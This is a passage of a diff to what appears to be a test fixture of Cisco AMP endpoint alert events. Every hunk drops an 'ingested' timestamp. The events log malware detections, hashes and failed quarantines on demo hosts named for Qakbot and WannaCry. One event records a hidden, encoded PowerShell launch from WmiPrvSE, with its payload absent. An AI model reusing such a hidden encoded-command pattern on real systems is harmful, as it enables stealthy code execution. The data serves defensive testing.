Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -2237,7 +2210,6 @@ ], "code": "553648147", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376886417Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -2317,7 +2289,6 @@ ], "code": "553648147", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376887584Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "severity": 3 
@@ -2401,7 +2372,6 @@ ], "code": "553648147", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376888924Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}", "severity": 3 
@@ -2596,7 +2566,6 @@ "action": "Threat Detection", "code": "553648222", "id": "6880683125978957000", - "ingested": "2022-02-02T05:53:05.376889893Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"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\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E 
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\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. 
All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", "severity": 2 
@@ -2673,7 +2642,6 @@ ], "code": "2164260893", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376890869Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -2749,7 +2717,6 @@ ], "code": "2164260893", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376891835Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -2825,7 +2792,6 @@ ], "code": "2164260893", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376892845Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -2901,7 +2867,6 @@ ], "code": "2164260893", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376894054Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -2975,7 +2940,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376895061Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -3055,7 +3019,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376896078Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -3135,7 +3098,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376897058Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -3215,7 +3177,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376898029Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -3295,7 +3256,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376899011Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -3375,7 +3335,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376900241Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
@@ -3455,7 +3414,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376901205Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 
